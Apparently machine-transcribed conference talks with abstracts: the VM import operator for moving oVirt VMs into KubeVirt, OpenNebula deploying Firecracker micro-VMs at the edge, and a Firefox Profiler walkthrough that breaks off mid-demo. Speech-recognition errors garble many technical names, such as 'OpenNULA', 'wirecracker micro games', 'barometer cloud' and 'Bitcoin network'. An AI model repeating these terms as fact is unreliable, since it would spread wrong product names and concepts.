its identifier. We'll use it a bit later. That VM has one network interface which is connected to APS network and it's using APS profile. The virtual machine has one disk which is a bootable disk hosting Fedora OS. Let's connect to the machine using VNC. Being there we can leave a message to ourselves that we check after the migration. Now I will show you what kind of resources need to be created to perform the virtual machine import. First we need to have a secret, Kubernetes secret containing information about our OVIRT cluster. We name it OVIRT secret, we place it in default namespace and we provide URL to our OVIRT engine, we provide username and password to it and we provide CA certificate that will be used while validating the OVIRT server. The other file we need is the virtual machine import resource that defines what needs to be migrated and add some options to that. So we name that FOSDM VM import, we place it in the default namespace, we reference the secret we've just created, we specify the name of the VM in Kubernetes, we specify where the VM should be started after the import and we provide ID of our OVIRT virtual machine that we want to import. We also have to provide mapping of resources from OVIRT to Kubernetes. So in this case we map disk with that ID to standard storage class. In case of network we map network used by the virtual machine in OVIRT to be of type POD. So it will be a POD network. Let's confirm that our storage class is available in the cluster, the operator otherwise would report a error. Yes it is, it exists. Let's apply the secret against the cluster. Let's create the virtual machine import object. It's been created. Let's have a look what is the status of that object. It should have the status updated at this stage and we can see that validation was completed successfully. The configuration of VM reported some warnings that do not block the VM from being imported. Let's refresh it and now the disk copying is running. So now we are waiting for the VM disk to be present in Kubernetes. Let's have a look. We should have data volume created for that. Yes it is, it's being populated and we can wait for it to be done. When the import is done we should see that our virtual machine import succeeds. Let's have a look at the virtual machine in OVIRT. It's down. For the time of the import the virtual machine is shut down and it stays this way if the VM starts successfully in QVIRT. The disk of the virtual machine is pretty large so it will take some time to complete. We're almost there. It's 100%. It should report successful in a moment. Yes it's successful. Let's have a look at our virtual machine import CR. What is the status of it? We can see that the virtual machine is ready and it's successful. Also there is another way of tracking progress of the import. There is an annotation on our CR that shows what is the percentage of the import. We also have an annotation showing what was the original state of the virtual machine. That's our virtual machine instance running in Kubernetes. It's got podnetwork address assigned. Let's connect to it using SSH. We need to get into the cluster network and SSH to it. It worked. Let's have a look at our hello file. It's there and it provides the proper date. Let's also connect graphically to our virtual machine. It should be possible with Vue CTL command. After the login we'll check the hello file and confirm that it's actually the same virtual machine and it works correctly. Yes, it is. Virtual machine import operator design. Virtual machine import operator comprises of two single container pods, VM import controller and VM import operator. VM import controller pod is responsible for executing the VM import reconciliation loop. And VM import operator's responsibility is managing lifecycle of the VM import controller and all related resources, CRDs, service account, role, role-binding, deployment and services. It uses controller lifecycle operator SDK and library that was created from code developed by the CTI developers for the needs of their project. The code was so useful and applicable in other scenarios that I've extracted and modified it to create the library and use it in the VM import operator. In fact, using that library gives an operator compatibility with HCO requirements. The library provides code that manages resources defined by a developer. It undertakes proper actions when creation, removal or upgrade is requested. If one wanted to implement operator that manages multiple resources and makes sure that their configuration is always correct and allow for updating them, for example upgrading version of a container within deployment, one would have to spend a lot of time implementing tedious state machine code. The library makes it as easy as implementing a few interfaces and using provided structure in the reconcile method. If one needs to have many separate applications managed in a similar way, the controller lifecycle operator SDK is a thing to use in each of these operators. Library is extensible so it can be applied in very different use cases. The controller lifecycle operator SDK consists of several packages that can be used together or separately. API package defines common types and constants that are required by the other parts of the library and that are compatible with HCO. SDK package provides several helper functions used in the other parts of the library. Callbox package provides callback registration and dispatching facilities used to execute additional resource management logic in predefined places in the reconciliation loop. Reconciler package provides resource definition helpers for creating them with only a few method parameters. It can remove a lot of boilerplate related to creating deployment, service and other types of resources. Open API package in turn provides open API definition of the common status structure. Reconciler package provides reconciler structure responsible for executing lifecycle reconciliation. Reconciler wants to use the reconciler as to provide a resource type definition that makes use of SDK provided status type and implementation of a following interface where most of the methods take the user defined CR as parameter. Here is an example of an actual status definition making use of the SDK type. The code comes from a reference implementation of an operator using the SDK. I invite you to have a look at it and see how simple it is to create an operator that can oversee multiple resources. CR manager methods are mostly one-liners except for getAllResources method which provides instances of managed resource objects and it can be as long as many resources you need to oversee. After the overview of the infrastructural part of the operator, let's have a look at the domain side of it. Virtual machine import is a namespace custom resource that defines the source of the VM, the identifier of the VM on the source and the mapping to be used for the import. The mapping of resources, network and storage from the external VM provider to Qubeword is defined in the resource mapping custom resource. What is secret is needed to define the endpoint and credentials to the source provider. The virtual machine import resource creation triggers the reconciliation and the first step there is to retrieve virtual machine information from the source provider. Then that virtual machine is validated. The source virtual machine is stopped after the validation and then there is a virtual machine created in Qubeword. Hello meaning it doesn't have disks yet. The disks will be imported later by CDI. The reconciliation code creates data volumes to request the import of data from Ovid to Kubernetes. And then those data volumes are monitored by our operator to continue its own processing when they are done. In case of VMware the guest has to be converted after the disk is present in Kubernetes and that is executed in a job for which the operator also waits. When it's done the virtual machine is started. Let me highlight the key takeaways from my presentation. After this talk you should have awareness of the VM import operator and how it can be used to help with infrastructure migration from virtual machine based one to a container centric one, Kubernetes. The information provided about the operator SDK and controller lifecycle operator SDK should allow you to start working with them to address the specific needs you may face in Kubernetes. Thank you very much. Anywhere to say goodbye? Okay. Hi, I think I answered the question regarding some resources. Just to recap, it's the readme of the controller lifecycle operator SDK. That's the description. Also the actual production usage in the VM import operator and CDI, which also has been refactored to you to use that library. Also as I mentioned on the slide, the controller lifecycle operator SDK contains example implementation. I give these very Mozilla screenshot to two people. Do you have another questions or did I miss anything? you you Thank you Thank you very much for listening. Thank you very much for listening.
Operator SDK is a solid foundation for building robust applications for Kubernetes; one of such applications is the VM import operator allowing Kubernetes administrators to easily import their oVirt-managed virtual machines to KubeVirt. In this talk, the speaker will show how his team used Operator SDK to build the VM import operator and how that operator can be used. The Kubernetes is on a rise and thanks to its capabilities many developers and administrators want to migrate their workloads there, which not always is possible right away or easy to do. VM import operator can help in decomposing any applications previously running in oVirt. If the current deployment doesn’t allow for that, Operator SDK can ease the burden of either migrating existing applications to a new stack or building tools that can allow existing software to run in a completely new environment. The attendees will: - learn basic principles guiding development with OperatorSDK; - learn how VM import operator works; - know how to import their oVirt workloads to Kubernetes, hassle-free.
10.5446/52822 (DOI)
Okay, hello everyone, I'm Cristian Gonzales. I'm here today to talk to you about serverless computing with OpenNULA and more specifically about running wirecracker micro games at the edge. First of all, I'd like to thank the event organization for letting me be here today with you and also for the great work they've done knowing these difficult circumstances. So let me start introducing a little bit about myself. I'm a cloud engineer at OpenNULA and I've been in charge of the development of wirecracker and Docker Hub integration, which are two of the main topics that we're going to cover here today. So let's start with what is OpenNULA for those who are not really familiar with it. So OpenNULA is a simple feature with a flexible solution to build and manage enterprise clouds. It combines existing virtualization technologies like VMware, KBM, virtual machines, LXT system container or last addition of firecracker micro games. It combines all these existing virtualization technologies with some advanced features like multi-tenancy, automatic provisioning or elasticity to offer on demand virtualized service and application. So this is the basic of what OpenNULA is. So let's see now how is OpenNULA being used. There are four main scenarios that OpenNULA covered. OpenNULA will allow you to manage your own premise infrastructure. It will also allow you to manage any hosted infrastructure. It also allows you to deploy virtualized load in public cloud providers. And the last scenario is to allocate and manage its infrastructure. This last scenario or this last case is the one we call the two hybrid cloud architecture. You can find more information in this link below the bottom of the slide. We like to say that this is the two hybrid cloud because you will use a cloud, a barometer cloud providers for allocating infrastructure, yes, a barometer infrastructure, and then you will deploy all the different types of virtualized loads that we support. We will go into that deeper in a moment. This is the main case that we are going to cover today. So first of all, we are here today to speak about two different topics, the edge computing and the serverless computing. First of all, I'm going to give you some overview of how we think of those of these topics in OpenNULA. And after that, we will make a demo to show how two of them work together. So I'd like to introduce our goals in each of these topics regarding the edge computing. Our main goal is to provide some tools to your users to allow them to easily quickly deploy edge infrastructure by using barometer cloud providers. So once we have this infrastructure, we want you to run serverless loads on them. We want you to provide a fast and secure way of deploying this serverless load. And in order to do so, we think that the best strategy is to use five QuarkMac Williams along with Docker images. We'll cover this also during today's talk. So let's focus first in the edge. Let me introduce you to the 1-H.io project. This project is the project that wraps all the development that we've been doing in OpenNULA related with edge computing. It has received funding from the Horizon 2020 Research Innovation Program of the European Union to help out a lot with this development. Now that we know what the 1-H's project is, let me... We provide an overview of the three main points that we took into account when we were designing these edge tools for allowing our users to easily and quickly allocate and manage their edge infrastructure. There are three main points. The first of all is this innovative cloud desegregation. Currently, with all the globalization, companies' requirements are changing. Previously, companies have a big data center, centralizes in their main headquarters or whatever that provides services for all the services that this company provides. But lately with the globalization, most of the companies aims to provide services worldwide and this architecture is a bit limited for today's requirements. So companies are needing to desegregate their data center. I have multiple data centers in multiple locations. I'm probably smaller than this one big data center. We know that maintaining or being able to have this multiple data center spread around the world is difficult or even impossible for many companies that cannot afford the cost of maintaining and having these data centers. So we also notice the emergence of these barometer cloud infrastructure providers, which allows us to allocate a barometer infrastructure on demand. And with a more affordable prices or cost for these kind of companies. So we took advantage of this. And also the current state of the automation tools like Ansible or Terrafor, which allows us to really easily and quickly allocate and configure infrastructure. We took these three main topics or points and we developed our one provision tool, which will take advantage of all of these topics for allowing our clients to allocate and manage the edge infrastructure in a very quickly and very easy way. We will see later in the demo. So now that we have clear the philosophy behind the edge computing part of OpenEvola, I'd like to introduce a little bit about Firecracker, which is more related with the serverless part. For those which are not familiar with Firecracker, Firecracker is a pretty much in monitor developed by the team of AWS. It uses for example in AWS Lambda and Firegate. The aim of Firecracker is to provide us with a visualization technology that has a really low overhead and is really secure before Firecracker. When you want to deploy virtualized loads, you need to choose between virtual machines, which are more secure, but they have more overhead or between containers, which are way more lightweight, but they may have some security problems compared with virtual machines. Firecracker came to break this trade-off and tried to provide a technology that has the best of the two of them. It provides a very lightweight VMs, which they call micro-VMs, and with a very low overhead, which allows us to increase the density on our hyperbisodes nodes. It also is a very secure way of deploying virtualized loads because it has this visualization layer which just increases the security along with other measures that they have for making sure that the VM is as secure. Much secure as they can develop it. So Firecracker works in the same layer of Kimu. Yes, it focuses on having a very low light weight, which has some price, but it's a price that we are willing to pay. In top of Firecracker, we have developed some drivers for integrating it totally in the open-level environment. So we have developed all the monitoring drivers to make sure that micro-VMs are monitored even also for the health and the monitoring stuff like the usage and all this kind of stuff. All the monitoring information that is available for a normal VM in OpenNebula is also available for micro-VMs. We have also developed a way for accessing the micro-VMs through BNC protocol, which is very useful when you need quick access to the micro-VM for debugging stuff, for example. And also for drivers, for networking and storage are available for Firecracker, which allows you to play, for example, Firecracker micro-VMs with BX LAN or VLAN, whichever networking driver you were using previously. So once we have this Firecracker integration ready, the necessary for us was to find a way of allowing our users to gather or to retrieve an image that they could use with Firecracker. I didn't mention it earlier, but Firecracker, in order to, it needs two main things, our five system image, which is this Docker Hub image, and it also needs a complexed kernel image, which we have built some of them and have uploaded into your marketplace, but you can also build your own kernel image with the version and the flags that you need and just use that image depending on your requirement. So we set it to Docker Hub because there is a wide range of images already there, and it is well known by most of the people. So we thought that that was the solution that better fits all the requirements, it will allow us to instantly have a wide range or to a wide catalog of technologies that can be easily deployed with Firecracker micro-vm for allowing the user to have the flexibility they need deploying their serverless workloads. So now that we have an overview of the way we think of the ads and serverless topics, I'd like to show you how this really likes in real world and how this thing I've been talking about fits together. So I have prepared a demo for you, for this demo. I have only prepared an OpenNegla node, an OpenNegla installed in a node. In this case, I'm using an AWS bit machine, but it is anecdotal. We just need an address location, which is going to be this VM. In this VM, I have just installed OpenNegla packages and the OneProvision packages, which is the package that provides OpenNegla for installing this OpenNegla and the OneProvision tool, which is the tool that we are going to use for provisioning the resources, which is the first half of today's tutorial. We are going to provision some extra resources, and later once we have these resources ready, we are going to deploy serverless loads on these resources. So here you have the graphic showing the result that we are going to have. We are going to have an ads node in Amsterdam by using this Achinis Metal provider, previously known as Packet. And we are going to deploy some application on top of it. So you can see how with a couple of commands, we are able to both allocate the infrastructure and start running serverless load. So the first part of the tutorial, as I said, is to provisioning the extra resources. So it has three main steps. First of all, we need to define a YAMMN file with all the details of the provision, like the physical resources that we want to allocate, in this case, our host in Amsterdam. And we can also define some virtual resources related with OpenNevula that we want to allocate for this provision so they are all going to be related. And it will make it really easy to start deploying serverless loads once we have finished allocating these resources. Once we have this YAMMN file ready, we are going to want to validate it to make sure that the syntax in the file is correct. And after that, we are going to be ready for deploying the resources. So let me share this scheme with you, this YAMMN file here in the right side of the screen, you can see the YAMMN file I have prepared. First of all, we define here a name for the provision. The provision is going to be all the set of resources that we are going to define in this YAMMN. In this case, I call it FOSDEN. And the next step is to define a playbook we are going to use. For this provision, we want to provision a Firecracker node. So I'm going to use this, the full Firecracker playbook. Just letting you know that we use Ansible for configuring the host once we have allocated them in the environmental provider. So these playbooks are provided by OpenNevula. So you just need to read the documentation to know which specific role you want to use depending on your necessities or you can even customize them or adding some dependencies if you need to configure something else. Below this, we are going to define some information related to the provider we are going to use. In this case, we are going to use the packet driver. Here you need to provide some information for accessing the packet and the project you want to use. Some information also on the kind of instances that we are going to instantiate and where do we want to instantiate them. And after that, we just need to start defining the resources that we want to allocate. So here we are specifying that we want to allocate one host. This host is going to be used by the packet drivers. And we are going to call it like that. This name is for the environmental provider. So if we log in into the environmental provider, we can identify different hosts that we have allocated. We have a host ready to be used. We want to create some data stores. So we can use this data store within that host. We have created here the final one data store of each type of the data that OpenNabla supported, one for EMIOS, one for system, which is where the VMs are going to be running, and one for files, which is where we are going to start all these new NUSKernet, for example, files. After that, we are going to want to access the services in the VM. We are going to create two networks, one pre-rate for inter-VN communication in the host and one poolit for allowing our users to access the VMs externally. And lately, we are going to create, we are going to download two EMIOS from our marketplace, a kernel image here. This will be used by Firecracker to within the micro-VM. And in this case, we are going to download the engines from Docker Hub. So at the end of the tutorial, we are going to have an engines micro-VM running with engines ready to be used. So now we can take all this information, all these resources that we have allocated above, and we can define a virtual matching template, which is the template that we are going to instantiate in order to start deploying instances of these engines in match that we are going to create. So we call the template FOSTAIN-Engines. Here we define some capacity values. In the context section, we define some configuration that we want to perform in the VM when it boots. So we want to configure the networking. We also want to add the user's SHKey. And here we have some small script for config for starting the engine X service. Here also we are adding the disk that we want to use. In this case, the image with ID1, which is this one here. We want to use this engine X-Machine in our virtual matching template. Also we are going to add a couple of network interfaces, one for a privata and one for a public one. We also want to configure the BNC for our virtual machine or micro-BM. And here we configure all the kernel information that we need to boot the micro-BM. So once the kernel is ready, we need to validate it. So let me go to the server. Here in the server, we are going to validate the jammer. I have the exact same jammer, but with the local credential currently defined instead of this aesthetic symbol. So we need to run this one provision validate command over the jammer file. So we can see that it hasn't so many errors. So it means that our file syntax is correct. So we can proceed to provision the infrastructure. So in order to do so, we are going to run the one provision create command. We are going to pass the same jammer file. And we are going to pass this flag here for some debug information. So we can make sure that everything is working as expected. So we just hit enter and the provision, the one provision tool is going to start allocating all the resources that we have defined in the jammer. This could take a while. So let's wait a little bit. So now we can see that the SQ don't have finished. So let's see a little bit of the log to check what different things it's been doing. So let me go up. So here it started. Just to let you know that the other time it started at 1827 and it finishes at 1834. So it took about seven minutes to allocate all the resources including the infrastructure in the environmental provider. So here it is creating some resources like the data store, this kind of stuff. After that it starts creating the host, it allocates the hosting, the environmental provider. Here once the host is ready it starts running the Ansible scripts for configuring. We can see here some debug information. And once this is ready it starts creating the rest of the resources like EMI, bit.com and templates and all this kind of stuff, so all the resources that we have allocated should be ready to be used in our environment. So in order to check that we can connect to our system which is our web interface and we are going to make sure that all the resources are there. So we are going to come here to the storage tab and we are going to look for this data store that we have created previously. We can see the three of them here. We are going to look for the engine XE mat. We can see it is here in the first data store. Let's look for the kernel image. You can see it here also in the first data store. We can also come here to look for the VM template. You can see you have it already available here too. And that's we are going to check for the host. We can see the host is here and it is successfully monitored. So everything is working as expected. And lately let's check for the Bitcoin network. So we can see here that we have this fully compiled Bitcoin network we have created. So now we have all the resources allocated. We can proceed with the next part of the today's demo which is the point serverless loads. In order to deploy this serverless loads which are wirecracker micro-vm images. First of all we need to import an official image from Docker Hub. We have done this in the YAML. But we could do this manually if we want in order to say something I have done in the YAML. We need to customize the micro-vm template. This network interfaces or this image is all the things I mentioned earlier in while discussing the YAML file. So both of these steps are already done by the one provision because we define these resources in the YAML file. So the next step is only to deploy or serverless load. So in order to do that we can come here to the VM templates. We are going to instantiate this FOSDM and YAML template and wait for it to be deployed. So we are going to instantiate it. Okay, it's taking a little bit. Okay, now we have instantiated so we can go to the instances view. Now we can see here that it is booting. Let's wait some seconds for it to finish. Okay, so now we can see that the micro-vm is ready to run. If you just thought about it, the only thing we have done is running the one provision command. We have already instantiated all the resources in the file in the YAML. And after that we just need to instantiate the template and we already have our engine servers running. Let's check if it is overworking as expected. So we can take here the public IP of the service. We are going to connect to it. So if we connect to our IP address, we can see that the engine server is up and running. So the deployment has been successful. We can also check the BNC if we want. You can see that we have access here to the BNC by using this BNC protocol. So now we have everything running. If the next step will be to remove the infrastructure, so imagine that you have allocated some resources. You have already used it and you don't need it anymore. So first of all we are going to terminate the virtual machine here. Okay. Now the virtual machine has been terminated. And the next step will be to remove the provision that we have created. So in order to do so, we need to take the provision ID. We can do this. Let's take this with one provision list command. This is listing here all the provision. We have the default provision here. So we are going to terminate this provision to remove the resources that have been created for this provision. So we just run this provision, delete. We pass the ID and we are going to use the cleanup flag. Now the resources are being deleted. Now everything is deleted. So now resources should be available now. All the images are templates that we have created before should be removed now. So let's check it. We can see that there is no image there. There are also no template here. We can check also for the host. But as you can see, all the resources have been removed. So we just, a couple of commands, you can allocate all the infrastructure you need. And with one command, you can also tear down everything at once. And you have already seen how easily you can start deploying this, virtualizes several loads in your infrastructure that we have just allocated in around 10 minutes. So now we have seen how all this works together. I'd like to share with you some improvements that we are going to add in the upcoming OpenEvola 6.0 version, which is our next major release, which we aim to have some beta version for February. So the most important improvements that we are targeting to add for this version, for this OpenEvola release, is to improve the user experience for application deployment. We are working on a specialized user interface for deploying applications more easily. We want also to make it easier to incorporate the new infrastructure providers so we can add more providers to our catalogs easier. Also we want to provide a web interface for the provisioning tool, which as you have seen, it's only available in the command line interface. And also we are leveraging some work for facilitating the deployment of lightweight Kubernetes cluster at the edge. We are working with the Rancher people and the MikroK Kubernetes people for implementing these strategies. So that will be out soon. I hope it's interesting for you. So now I'd like to cover some use cases. Just to let you know some proof of context that we've been doing with some of our clients. And there are some topics that we think that it's infrastructure around with the serverless fits really well. So one of the more basic cases is the low latency gaming. When you want to provide an online game, your user, you probably want to reduce the latency at maximum. So because it will increase the user experience. For those who are gamers, you will be familiar with this feeling for everyone. The internet connection is not as good as it should be. Also the live broadcasting is another really interesting topic for the edge computing. This will reduce a lot of the loading times. So we have making some interesting proof of concept with the internet of things and telecom edge cloud. You can find more details here. This can also be applied to the desktop virtualization environments. And also for, as I mentioned, we are working on Kubernetes deployment on top of OpenNegra which could add a lot of flexibility. And that's all for today. Here you have some information. If you are interested in giving it a try and check out how you could do that or you can emulate the demo I performed today, you can use this mini one tool which is a very simple tool that allows you with a quick steps to install OpenNegra in your laptop for a sample and have it ready to start deploying any virtualized load that you need. So for example, SD, KBM, or Firecracker. Also we suggest to try to correlate this release which is Firewall. Maybe when this talk came out, you already have available the release candidate for the latest version. So you could also give it a try to that. So here there is some contact information. In case someone is interested in contacting us, feel free to reach us for anything that you might think is interesting. And now let's start with the Q&A. Thank you very much. Thank you
OpenNebula has recently incorporated a new supported hypervisor: Firecracker. This next generation virtualization technology was launched by AWS in late 2018 and is designed for secure multi-tenant container-based services. This integration provides an innovative solution to the classic dilemma between using containers—lighter but with weaker security—or Virtual Machines—with strong security but high overhead. Firecracker is an open source technology that makes use of KVM to launch lightweight Virtual Machines—called micro-VMs—for enhanced security, workload isolation, and resource efficiency. It is widely used by AWS as part of their Fargate and Lambda services. Firecracker opens up a whole new world of possibilities as the foundation for serverless offerings that need to deploy containerized critical applications nearly instantly while keeping them in isolation. OpenNebula is a simple, yet robust, open source platform for building Enterprise Clouds and managing Data Center virtualization. Its integration with public cloud providers offers additional flexibility in creating True Hybrid and Edge infrastructures. By incorporating Firecracker, OpenNebula now provides users with a powerful solution for serverless computing and an alternative, native model for secure container orchestration. In this talk we will explain the technical details of this integration and will show a live demo on how to easily deploy and orchestrate a composition of Docker Hub images running as Firecracker microVMs on a distributed bare-metal Edge infrastructure.
10.5446/52827 (DOI)
Hi everyone, thanks for coming to my talk. Today I will be talking about using the Firefox Profiler for Web Performance Analysis. I am Nazim Janalsnova, I am currently living in Berlin and I am originally from Turkey and I am a software engineer at Mozilla. I am working in the performance tooling team which is responsible of Firefox Profiler and these are my Twitter and GitHub handles if you are curious. So today I am going to be talking about briefly what a Profiler is and then I am going to switch to what Firefox Profiler is and its advantages are and talk about how to capture a Profile and then after I am going to talk about how to capture a good Profile and after this I am going to be showing you the Profiler Analysis UI and then I am going to show you the Profiler sharing feature and lastly I am going to do a demo session where I am going to open up a Profile and show you the UI in a more interactive way and then I will analyze two performance issues. So these performance issues are actually from Firefox Profiler itself so we are going to be profiling the Profiler and the first performance issue is about it is written over a big loop and the second one is about a reflow issue. So if you are curious about the Firefox Profiler already you can check out Profile.Firefox.com but we are going to get into the details pretty soon anyway. So this is a quick preview about what you are going to see when you open up an analysis UI in the Firefox Profiler but so it is kind of crowded if you are looking at it at the first time but don't worry if it is looking intimidating so we are going to get into the details of the UI pretty soon and you are going to understand all the components. But first we need to know what a Profiler is. In a very broad explanation Profiler is a tool that helps developers to analyze performance issues and it gives insight. So I know that this is a very broad explanation but this is because there are lots of different types of Profilers that are event based Profilers, statistical Profilers, instrumentations and heap Profilers for memory Profilers. So they all do different things under the hood but essentially the goal is the same. They give insight about your program and about the execution of your program. So it will really take a lot of time to explain all those types but at least I can explain to you what is the Firefox Profiler. So it is a built-in Profiler that comes with Firefox so you can profile your web apps, your web extensions or even Firefox itself with it. Firefox Profiler is a statistical Profiler in its core but there are also other types of data sources like markers and screenshots and so it is a lot richer than just a statistical Profiler. So when you record a Profile, statistical Profilers works like this. So when you start recording it stops the execution of the program every one millisecond and gets all the information that it needs. There can be the call stack or CPU usage or any other type of information that it needs and then resumes the program. So it continues to do that every one millisecond or every end millisecond and then after that when you capture that Profile it aggregates all this data and uses statistical approximation to visualize it for you. So a little bit of history. So this is the old performance tab in the developer tools panel. So that tab for both recording and the analysis. And in the new one in the Firefox Profiler we have two different UIs now. The recording UI and the analysis UI. This is because recording UI should be very minimal and the analysis UI also should be more powerful by utilizing all the space. So that's why we have two different UIs now. So this is the motto of Firefox Profiler. Capture a Profile, analyze it, share it and make the web faster. And let's see what the main advantages of the Firefox Profiler are. So it has more information with markers, screenshots, network requests and different type of visualizations and more. Also this is one of the things that were actually written in the motto. So you can capture a Profile and then share it with an expert. So this is pretty important because previously it wasn't as easy to share a Profile data with someone else. So but now in this case you can either be the expert or somebody else can be the expert. And let's say that you are the expert and you cannot reproduce the issue. You can tell your colleague who can reproduce the issue to just capture a Profile for you and send it to you. Then with that Profile you will be able to see what is that program doing at that moment and you can understand the issue better. So or somebody else can be the expert and that way you can just capture a Profile and send it to them and they will be able to understand the issue better with that recording. And let's see how to capture a Profile then. Actually there are multiple ways to enable the Firefox Profiler but I think this is the easiest one. So you can go to Profile.Firefox.com as I told you and then follow the instructions. That's pretty much it because there is a big button that says enable the Profiler menu button. When you click on that a menu button will appear on the top right corner of your Firefox and then when you click on that little arrow you will see this pop up. So this is the recording UI as I've shown you before. There are not a lot of things to show here. There are settings which is web developers by default and this is the most lightweight version. So I would recommend to use that and if you want to learn more you can click on that link and that will redirect you to the documentation but also you can find the documentation link at the end of these slides. And there is just start recording and capture recording button. But also it's good to note that you can directly start and capture a Profile with the shortcuts. This is pretty important because sometimes you wouldn't want to open the pop up all the time because opening a pop up also creates an overhead for the Firefox and you wouldn't want the recording of this pop up visualization in your profile. So you can just use the shortcuts which is Ctrl shoot 1 and Ctrl shoot 2. So now we've looked at how to capture Profile. Now let's see how to capture a good Profile. So because take away is to isolate the problem as much as possible. We don't want to see unrelated information in the Profile because that can distract us very easily. So it's not a must but it's a good practice to remove the unrelated tabs and make sure that nothing else can interfere with the program that you are profiling and skewed the data. So the second thing is to make sure you reproduce the result you want because sometimes you might be looking at an intermittent issue and it may be tricky to reproduce. So you need to check the result in your web application to make sure that the result is the thing that you want. And also check in the Profile analysis UI that you captured it successfully and you're happy with the result because sometimes you can start the Profile in too late or you can end it too early so you may miss the important piece. So don't hesitate to take multiple Profiles and don't be afraid of like just discarding the old ones if you're not happy with them. And now we've seen how to capture Profile. The next step is the Profiler analysis. So let's see the Analysis UI. So as I've shown you before this is the Analysis UI and at the top you are going to see the timeline. And this is an overview of the Firefox's execution of your tab that you're profiling. It's a great way to see what's going on because the X axis is the time and the other categories or other colors are the functions that are being called. So you can understand in which time what type of function is being called. And it's also a great place to navigate in your Profile. So for the navigation we have this range selection. You can drag and drop a range and zoom in that view by clicking on that magnifier button. So when you click on that this will use the 100% of the width and all the information in the Analysis UI will be updated for the view that you're seeing only. And also in this timeline we have the Screenshots. So that's a great visual indicator to see what's happening in the web page when you are recording this Profile. And for example when you are calling a function or when you're clicking somewhere. So when you hover over a screenshot also in the timeline you will see this bigger version of the screenshot so you can see more details. Also below the Screenshots we have the category Graph. So this is the Graph of the functions that are being called but they are aggregated by the category. And all the colors in that Graph represents a different category. So for example in this Graph yellow means JavaScript, blue means DOM and orange means GC. So if you see a lot of oranges intermittently all the time that means that we're doing a lot of GC and then you can try to understand why we are doing this and you can try to reduce that GC time because that can create an overhead overall. And under the category view we have the Markers. So Markers are important events that are happening inside the Firefox's code execution. So they are more precise and they also include additional information. So that's why they are pretty important and you can see a lot of things, a lot of insights. As you can see in these they are just black boxes but when you hover over those you are going to see a lot of information. Also I'm going to show you in the next slide. Also the good thing to note that like you can actually create your own markers by using the performance mark and performance measure APIs from JavaScript directly. So when you hover over those little squares you are going to see this Marker tooltip. So this tooltip gives you a lot more information about those squares. For example at first it gives you the time spent for that marker and then the name and additional information. In this case this is the styles marker and it gives you even the all styles related numbers. And in this area we have the resources panel. So this was actually collapsed at first so it wasn't visible but you can click and expand it. And when you expand it you are going to see the iframe that belongs to that web page. So in this case this was the cnn.com and as you can see there are 10 iframes and all of them are either tracking iframes or iframes that are related to ads. And actually if you look at that like most of them are pretty empty and that's because Firefox does a pretty good job on tracking the I mean removing the tracking iframes and that is thanks to the enhanced tracking protection. But if you look at the last iframe there are some activity going on. So this was because this is the ads loading in that time. So we've seen the timeline now and the timeline was the overview overall. And at the bottom side we have the panels and these panels are a lot more comprehensive and a lot more detailed. So when you are done with the timeline and when you are having an over evane when you understand where you should look then you switch back to the panels and understand or try to understand what is happening in a more detailed way. So there are lots of tabs in this panel so I'm not gonna explain everything right now because it's a lot better to do it in the demo section so I'm gonna defer that to that time. So we've talked about sharing a profile before now let's see how we can actually share it. So on the top right corner you're gonna see an upload button. When you click on that you're gonna see this panel. So there are some checkbox in it. So these checkboxes are for including or excluding some information that may or may not be personally identifiable. So for example there are screenshots, there are URLs or extension information. So these type of things can be personally identifiable and you may not be comfortable sharing those. So before uploading the profile you can uncheck those and that way you may you will not share the things that you're uncomfortable with. And lastly when you click on that upload button you're gonna see that permalink and you can use that permalink to either send it to your colleague or you can just save it somewhere and then you can take a look at that profile later on. So now we've actually seen a lot of things and this was all the things that I wanted to show in the slides. Now I want to switch back to the demo section and tell you more about the UI and then analyze the performance issues. So this is an example profile and this is actually the same profile that I've shown you in the slides. So you're gonna see something like that. So when you hover over the screenshots you're gonna see the bigger versions and when you hover over those category graph and you're gonna see all the categories for example this is JavaScript, there's GC there happening, there are layout happening, another GC etc. And there are markers as you can see. So these markers are to show you what kind of events are being happening at that moment. For example there are some DOM events happening and there is big ready state change event happened etc. So and these are the panels that we've seen before but let me introduce you more about them. So there's Coltree, FlameGraph, StackChart, MarkerChart, MarkerTable and Network. So let's start with Network because this is the easiest one I guess. And I'm sure you're pretty familiar with the network panels and network requests so this is pretty similar to that. You see for example edition.sienand.com and you see how long it took and you see the breakdown of this network event too. So it took 204 milliseconds to load. So you can see other things as well. And in the MarkerTable and MarkerChart you see the more details of these markers. So the MarkerChart is pretty visual and pretty similar to the markers in the timeline actually. So you see but we separate them in a more categorized way because you see the DOM category here, you see the graphics, JavaScript, layout, network etc. So you can see what is happening and since there are also some information in here like you can understand what type of events that are being happening at that moment. And when you double click on that you will directly zoom into that wheel and it can go in if you want. Or you can also try to go in like this and then you can go out by using this. So and the MarkerTable is the table version of MarkerChart. So you can also right click on those copy, copy, marker, JSON. You can do the same things with this too. And for the Caltree, FlameGraph and StackChart we use that the samples that were collected here thanks to the statistical profile that I've mentioned before. So here we aggregate all the samples and show you for example in the roots of course everything took 100% of the total samples. But when you go down and go inside you're gonna see the breakdown. For example this JS run script took 9.7%. And of course you can just click on this JavaScript only and only focus on your JavaScript instead of some Firefox internals. So you can also option click on those or alt click and that will automatically expand everything. So since this is the cnn.com they're all minified functions but for your web page you will see the better function names. And also you can invert the call stack. When you invert it you will see the functions that took most of the time. So this is 3% of total samples and this is the longest running function in that profile. So also inverting the call stack actually gives you pretty interesting information too. And in the frame graph of course you need to you cannot invert it but in the flame graph you also see the visualized version of the Caltree. So it's the same data but with a different visualization. So you can still see what type of events are being happening at that time and then you can see what is being called. For example event handler none null calls this and this and then eventually offset hide is being called. And stack chart is also pretty similar but it's also like the opposite way. So flame graph is bottom to top and stack chart is top to bottom but also the difference is that the x axis of the stack chart is actually time. So it's pretty similar to what you see in this graph. For the flame graph x axis doesn't mean anything actually. So yeah we've seen the profiler so this is the permalink you can get, this is the reupload button if you can upload and this is the information about this profile. So let's go back to another profile and then this is a bug actually that I want to solve with you. So there is a performance issue with this so let me show you. When we resize this page it takes a lot of time to finish the resizing. As you see it just finished. So it shouldn't be like this right? When you make it bigger again it also takes a lot of time to resize back. So we need to figure out why this is taking so long. That's why I'm going to start the profile. So I've got the profile from profile.firefox.com now it's here so I'm going to start the profiler with control shift 1 and then resize it. And I'm going to wait until it's done but I'm also ready to just capture the profile now. So it's not quite done yet and when it's done now I'm going to capture it. So now I captured it. As you can see there are lots of reflows happening so you can clearly see that there is a reflow issue here because there are hundreds of reflows, reflow markers and you can look at the marker chart here there are lots of reflows. Also you can focus on this area because when you 